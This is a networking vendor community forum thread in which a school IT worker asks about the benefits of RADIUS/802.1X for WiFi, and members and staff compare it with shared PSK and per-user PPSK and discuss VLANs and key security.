Why would I want to set up my WiFi network with a Radius Server?

  • 2
  • Question
  • Updated 4 years ago
  • Answered
What are the advantages of using a Radius server? How could this improve my network?

I work at a high school and I have a network of 12 APs, and 220 connected devices (mainly iPads.)

Currently we have one SSID for everyone (faculty and students.) and one password for everyone also.

Please assume I know very little about Radius servers ;)
Photo of James Watson

James Watson

  • 16 Posts
  • 3 Reply Likes
  • thankful

Posted 5 years ago

  • 2
Photo of Brian Ambler

Brian Ambler

  • 245 Posts
  • 126 Reply Likes
Hi James,

I am by no means the authority on why everyone might or might not want to enable 802.1X/RADIUS authentication in place of WPA/2-PSK, but I will give you my opinion. As I see it, you could have a few benefits by enabling 802.1X/RADIUS on a school network, as well as a few downsides. There are likely many more pros and cons that I list below, but these are the big ones of the top of my head.

Pros:
1) Enhanced security when implemented properly
2) Enhanced reporting and tracking based on client usernames, even more so when tied into an LDAP backend such as Active Directory.
3) Ability to direct Faculty into one User Profile and Students into another based on LDAP membership and/or RADIUS attribute return. This allows you to place restrictions on the Student User Profile/VLAN (if desired) while keeping Faculty members unrestricted.

Cons:
If users are connecting to the wireless network with personal devices, 802.1X/RADIUS can be more complex/difficult for the most end users to configure, especially on Windows clients. Domain joined devices can easily be pre-configured, avoiding this potential hassle.

These what I can think of at the moment, but I'm sure others on the community will be able to expand on this list.

Hope this helps
Photo of Abby S

Abby S, Employee

  • 94 Posts
  • 47 Reply Likes
hi James, Just to support what Brian said, there are lots of cool reasons to use RADIUS to secure your wireless instead of a pre-shared key.

1. When a user authenticates to an SSID using 802.1X, that individual session is encrypted uniquely between the user and access point. This means that another user connected to the same SSID cannot sniff the traffic and acquire information because they will have a different encryption key for their connection. With a PSK network, every device connected to the access point is on a "shared encryption" connection so they can all see each other's traffic if they choose to do so.

2. If you need to de-auth a particular user or device, having RADIUS makes this much easier because you disconnect a single user or device without having to change the key for everyone or allow that potential security risk of that user re-joining the network with the known access key.

3. You can assign network permissions such as VLAN, firewall policy (including application permissions), QoS settings, tunneling policies, schedules - everything within a user profile can be dynamically assigned to users based on their identity. With a pre-shared key, you only get a single user profile that everyone shares. When you use 802.1X, you can assign different permissions based on the attribute returned from the RADIUS server (so as Brian said above, assign a different VLAN, maybe different application restrictions and firewall policies for faculty than students).

Now, with the "Con" that Brian listed above - one other potential solution you may want to look into is Aerohive's unique feature called Private Pre-Shared Key. This allows you to have the benefits 1, 2, and 3 I listed above but without the Con of having to configure a RADIUS server, client supplicants, or certificates on endpoints. More information about PPSK is available on our website if you're interested. The short overview is, a unique pre-shared key can be assigned to a particular user or group of users that distinguishes them from others connected to the same SSID and gives them an individually-encrypted session, you have the ability to de-auth a particular user or key, and you can assign permissions based on the key. :-)
Photo of Frank Sacksen

Frank Sacksen

  • 2 Posts
  • 0 Reply Likes
I want to set up a RADIUS server for the sole purpose of protecting the users from each other. I do not want any hassle with producing user names and passwords. Is it possible to set up a RADIUS server in such a way that the guests will not be asked of any information but still be given a unique encryption key?
Photo of Amanda

Amanda, Moderator

  • 396 Posts
  • 25 Reply Likes
Hi Frank - can I suggest you start a new thread where someone can help answer your specific question? This is an older, answered thread that is more general in nature and may not get the attention you need.
Photo of Shawn Rasmussen

Shawn Rasmussen

  • 33 Posts
  • 3 Reply Likes
Frank,
RADIUS, by nature, allows you to authenticate against a directory of some kind. Usually people that I have heard of are using it to authenticate to an existing directory service they already have in place, like Active Directory. In this way, you do not have to setup and maintain a separate directory for wireless, you are already doing it.

Talking about Guest users is another matter entirely, since by nature, they are not already a part of your existing directory. If requirements dictate RADIUS, you are going to have to have some kind of setup of directory/database users.

If 802.1x/RADIUS is not specifically dictated, you could look into the PPSK that others have talked about in this thread. I don't have that implemented, but others seem to like it. And I believe there is a component that allows users to self-register and create their own username and password. It's not 802.1x, but it is better than PSK. You can also configure firewall rules and disallow client-to-client communication, which can help protect users from each other.

The reason I didn't implement PPSK with self-registration is that I'm in an environment where the guest wifi is only a nice perk for visitors. We look at it as users shouldn't view it as an absolutely private connection. So we use PSK for guests with a captive portal where they agree to these terms - all on a separate VLAN for guest wifi. For our corporate users, we are using 802.1x on a separate SSID, which I would really encourage more people to look into. 802.1x really was not that hard to configure, and we already had the directory in place.

I realize that a tiered approach may not work for everyone. But for us, it is great.
Photo of Frank Sacksen

Frank Sacksen

  • 2 Posts
  • 0 Reply Likes
Shawn,

Thanks a lot for your direction. I will certainly go for PPSK. Though, I have yet to have understood why PPSK is less secure than 802.1x/Radius even after trawl the security sites for information. I assumed it has something to do with the protocol but even with key words in this respect I did find any good information.

I want to tell you I was shocked when I found out that WPA does not offer any protection between users on the same AP.  In fact, I did expect that the password/key only to have a function as authentification and then an individual key would be constructed. Something tells me that the 802.11* community doesn't care much for security. Even after the WEP crisis they are not able to come up with something that takes care of all the issues. It is really dispressing.

Regards

Frank.


Amanda Moderator: Yes, you can suggest, but I think that's a wrong way to go. If you feel this forum can gain anything from a rephrase of my question in a new post you go ahead produsing that post. I do realize this might be a forum ran by its members and with no income, but that's no excuse for running it stupid. You don't have to pardon my low tolerance for what does not make sense. If you think this is too much hostility for my account being intact, feel free to delete it. I just had it with so called morators and their tendency to power trip. I'm just a guest. I do not run this forum. You do. This is no over-reaction on my part. The net is filled with forums and moderators who misunderstand their role. That is if we cosider it with the use of reason.
Photo of Amanda

Amanda, Moderator

  • 396 Posts
  • 25 Reply Likes
Hello Frank – It looks like you got a helpful response from someone on our community. Excellent! HiveNation is full of awesome, helpful members who know their stuff and love to share. As always, one of my goals as moderator is to help people get answers to their questions. Often, but not always, a fresh, new thread is the right way to accomplish that. Glad you got the help you
needed :-)

Sincerely,

Amanda
(Edited)
Photo of James Watson

James Watson

  • 16 Posts
  • 3 Reply Likes
Thanks Brian, does this setup mean that every user would have there own username and password, which would need to be the same as the one in the LDAP?

What if they had two devices would they need two accounts (e.g. iPad and laptop.)

Has anyone used this in a K12 setting?

Thanks very much.
Photo of Brian Ambler

Brian Ambler

  • 245 Posts
  • 126 Reply Likes
Hi James,

Usually you would implement 802.1X/RADIUS to tie into an LDAP database for ease of use/management, but you could set up a RADIUS server that authenticated based on a separate, local database. Ideally you would design the LDAP or local database so that every individual has their own user identity to take full advantage of what Abby and I mentioned above.However I suppose you could create generic "Faculty" and "Student" usernames, though I wouldn't really recommend this route.

If an individual has more than one device which they would like to use their LDAP credentials to authenticate against the RADIUS server, this is possible, though you should be able to restrict this depending on the RADIUS server/user database used.

If your main goal is to restrict users to using their LDAP identities on designated or only on one device, you could manage this in LDAP (if you own all of the devices in a domain, ex: Active Directory), but you could also utilize PPSK to limit the number of devices on which they can use.
Photo of James Watson

James Watson

  • 16 Posts
  • 3 Reply Likes
Thank you both very much, I'm going to try the PPSK route. Are there any minimum AP requirements to do this? E.g. Must have at least one AP XXX on the network for this to work.

Thanks again.
Photo of Abby S

Abby S, Employee

  • 94 Posts
  • 47 Reply Likes
Hi James! All Aerohive APs support PPSK :-). Good luck! Interested to hear how you like it once you have it set up!!
Photo of Juha Lindstrom

Juha Lindstrom

  • 0 Posts
  • 1 Reply Like
I would also encourage you to try out the PPSK path. It looks like a great fit for your network.

I would also encourage you think about separating the staff and students to different vlans, making it easier for you to control their access through the rest of the network. In essence would make it quite easy to control access in the firewalls when they'd be in separate vlans and subnets. You can still use just one SSID, but based on the PPSK -group (in practice use user profiles) have the AP pass the traffic to different vlans.

It's a fairly simple setup once you get the hang of it, but would greatly enhance the security of your network. Also you could then play around with schedules in the users profiles to allow wireless access only during the hours/days allowed etc etc.

//Juha
Photo of Nick Lowe

Nick Lowe, Official Rep

  • 2491 Posts
  • 451 Reply Likes
I would respectfully dissent here and say that 802.1X is the gold standard to be strived towards, with PPSK the best compromise when it cannot be sensibly implemented for whatever reason.
Photo of Abby S

Abby S, Employee

  • 94 Posts
  • 47 Reply Likes
802.1X/WPA2-Enterprise is absolutely the gold standard of Wi-Fi security. However, in many situations, the daunting task of configuring a RADIUS server (plus returning attributes to assign different user profiles), configuring a CA and installing a certificate on at least the server side if not client side, configuring supplicants to support 802.1X (while this is easier with recent OS updates from all vendors, it is by no means foolproof when dealing with older clients), and then the operational expense of maintaining and troubleshooting a system that involves multiple components deters many folks from implementing what is the most secure way to connect to an SSID. If faced with the choice between a single pre-shared key on an SSID that limits functionality and has very little security, or an amazing Aerohive-patented feature that allows you to have nearly all the advantages of 802.1X (not all. No one disagrees there), I would/will suggest PPSK hands down every single day.
Photo of Brian Ambler

Brian Ambler

  • 245 Posts
  • 126 Reply Likes
While I agree with Nick in that 802.1X is certainly the best and most secure way to lock down an SSID on a network, as Abby mentions, sometimes it is just not possible to implement. This could be for a number of reasons, but regardless of the why, PPSK is definitely my second choice to secure a wireless network.

PPSK combines the ease of use on the end user side while mitigating the security risk of having just one PSK for all wireless users on a network as well as the hassle of having to refresh the entire user base's PSK when needed. Some of the other advantages of 802.1X are available as well, such as attribute return to place different users in user profiles with varying levels of restrictions based on their PPSK group membership.

That being said, I would still recommend 802.1X over PPSK if there is an existing architecture in place to support it or if it is feasible to implement, but I would not blindly insist on one method of authentication without first considering the requirements and constraints of the end user's network. Both 802.1X and PPSK are viable authentication options that, when configured properly, vastly improve upon the insecurities in standard PSK and other legacy authentication types.
Photo of James Watson

James Watson

  • 16 Posts
  • 3 Reply Likes
What happens if the AP acting acting as the PPSK server goes off line? Are you able to assign a backup? Will the assigned AP still operate as an AP?

Also I can't find the Idiots guide on how to correctly install this setup. Does anyone know where to find this?
Photo of Brian Ambler

Brian Ambler

  • 245 Posts
  • 126 Reply Likes
This is a great conversation that's separate from the main topic, so I created a new topic to continue the discussion if needed. Please reference the new topic here: How to configure PPSK
Photo of Brian Ambler

Brian Ambler

  • 245 Posts
  • 126 Reply Likes
James,

I forked this comment into a new tread to cover the PPSK Configuration How-to I created here, but I wanted to address you first question here as well as it is also relevant to this conversation.

A PPSK server is only needed if you are choosing to bind one or more MAC addresses to a PPSK or if you wish to configure self-registration. If all you wish to do is have users authenticate with their own PSKs (which is the standard configuration) then all of the APs store the individual PPSK digests. If one of your APs goes down, the wireless clients will be unable to authenticate against that AP, but they can still use any other APs in range.

More information about Private PSK can be found in the help here.
Photo of James Watson

James Watson

  • 16 Posts
  • 3 Reply Likes
Got it, this worked great and was easy to setup (as soon as someone shows you how!)

I'm going to deploy it to my high school which has approximately 240 iPads. I will let you know how it goes. I do have some other questions regarding the configuration, but I am thinking that would be best for another topic.

Thanks again!
Photo of Crowdie

Crowdie, Champ

  • 972 Posts
  • 272 Reply Likes
To put my five cents in I look at this problem in two parts:

1.  Authentication
2.  Security

From an authentication point of view if the user accounts exist in a database, such as Active Directory, that RADIUS supports then using 802.1X makes sense.  The users can authenticate to the wireless network using the same credentials they use to authenticate to the wired network and they don't have to remember a separate passphrase.  If the users do not have an account in a database that RADIUS supports then PPSKs are a better authentication method than a standard PSK as each user gets a unique PPSK and each PPSK can be individually revoked if required.

From a security point of view you want to stop people like me being able to access your network without authorisation. 

When you connect to a residential wireless ADSL router you enter a passphrase and somehow you are magically connected.  That passphrase is added to some other information, such as the SSID name, and a key is created.  You actually authenticate to the wireless ADSL router using that key rather than the passphrase.

With a PSK WLAN a single passphrase, and hence key, is used and it never changes.  If a cracker can get that key (or the passphrase that is used to create the key) they now have access to your network.  If you detect the intrusion then you need to change the PSK on the wireless network and every wireless device that is authorised to authenticate to the wireless network.

With a PPSK WLAN a unique passphrase, and hence key, is used for each person and it also never changes.  If a cracker can get that unique key (or the unique passphrase that is used to create the key) they now have access to your network.  If you detect the intrusion then you need to revoke the individual user's PPSK, create a new PPSK for the user and advise the user of the new PPSK.  All other PPSK users are unaffected.

With an 802.1X WLAN each user gets a new unique key each time the user authenticates to the wireless network with their user account credentials (rather than a separate passphrase).  This key continuously changes while the user is authenticated to the wireless network.  If it takes a cracker one hour to crack the key but the key is regenerating every thirty minutes then by the time the cracker has the key it is useless to him/her.  From a security point of view I see this as one of the major advantages of 802.1X over PSK/PPSK.

This is a very basic overview but if you would like to learn more about wireless security then I strongly recommend David Coleman's excellent Certified Wireless Security Professional official study guide (http://www.cwnp.com/certifications/cwsp/).

(Edited)
Photo of Nick Lowe

Nick Lowe, Official Rep

  • 2491 Posts
  • 451 Reply Likes
Crowdie,

Yes, absolutely!, but the salient consideration is that it is entirely moot where no brute force is required because certificiate validation is not taking place. All PSKs are 'stronger' than that, despite many being weak from a security perspective. That's my point... :)

Nick
(Edited)
Photo of Crowdie

Crowdie, Champ

  • 972 Posts
  • 272 Reply Likes

Agreed on the certificate validation but as I have said a few times during this discussion get a wireless professional to configure the 802.1X.

If you have a PSK WLAN and a nasty gets access to a corporate laptop (staff member leaves it on the back seat of their car, for example) then they have the passphrase due to Microsoft's wonderful "Show characters" option in, and this always makes me laugh, the "Security" tab of the wireless profile. 

Photo of Nick Lowe

Nick Lowe, Official Rep

  • 2491 Posts
  • 451 Reply Likes
Yup! Conceptially though that is no different to lifting an EAP's credentials. That's where you have to start looking at the integrity of the client. Proper lock down, encryption etc...

Practically, yes, lifting a PSK is easlier.
Photo of J. Goodnough

J. Goodnough, Champ

  • 266 Posts
  • 32 Reply Likes
Crowdie: a quick look at the aircrack-ng docs indicate that their only attack on wpa2 is a dictionary/bruteforce attack. WPA2 is not broken, as Nick pointed out.
Photo of Crowdie

Crowdie, Champ

  • 972 Posts
  • 272 Reply Likes
My apologies for the late reply but I have had two funerals to attend in the last three days.

I probably should have been more precise is my description but I was more trying to answer the original question then get into a low level discussion on 802.11 security. If you deploy a PSK WLAN with access to the corporate LAN and it is compromised the customer is not  going to care if the attack was at protocol level or a brute force attack. All they care about is that their wireless network was compromised and you configured it.

There may, however, be a possible solution.  As Nick has stated the trick to making a PSK hard to crack is to make the passphrase as long and complex as possible.  A 63 character passphrase consisting of letters (capitals and smalls), numbers and special characters could take 20+ years to crack with current technology.  However, it is not realistic to expect users, especially smartphone users, to manually enter 63 character complex passphrases.  The "ease of use" requirement almost always takes precedence over the security issue and passphrases with lengths between eight and twelve characters are deployed.

When Aerohive released the Client Management product the first thing I saw was a solution to the issue.  However, the licensing for Client Management makes this financially unrealistic.  If we could get a Private PSK deployment system, as Ruckus has, that isn't expensive we have an excellent solution.
(Edited)